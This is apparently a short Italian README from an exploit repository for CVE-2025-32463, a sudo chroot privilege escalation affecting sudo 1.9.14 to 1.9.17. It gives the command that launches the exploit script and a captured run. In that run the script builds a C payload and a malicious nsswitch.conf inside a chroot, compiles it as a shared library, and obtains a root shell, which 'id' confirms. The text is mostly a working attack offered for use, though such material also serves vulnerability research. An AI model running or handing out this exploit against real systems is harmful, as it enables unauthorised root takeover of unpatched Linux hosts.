
Versioni vulnerabili: da 1.9.14 a 1.9.17
bash run.sh
Esecuzione riuscita come di seguito:
neko@aosc-neko205 [ CVE-2025-32463_Exploit@main ] $ bash run.sh
[+] Script di riproduzione della vulnerabilità CVE-2025-32463 Sudo chroot
[*] Creazione della directory di lavoro temporanea...
[*] Directory di lavoro creata: /tmp/sudo_exploit.nc0EjT
[*] Creazione del payload in C (woot1337.c)...
[*] Configurazione dell'ambiente chroot e del nsswitch.conf dannoso...
[*] Compilazione del payload come libreria condivisa (libnss_/woot1337.so.2)...
[*] Compilazione riuscita!
[+] root shell!!!!!
woot!
root@aosc-neko205 [ / ] # id
uid=0(root) gid=0(root) gruppi=0(root),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1001(neko),1002(gamemode)
root@aosc-neko205 [ / ] # exit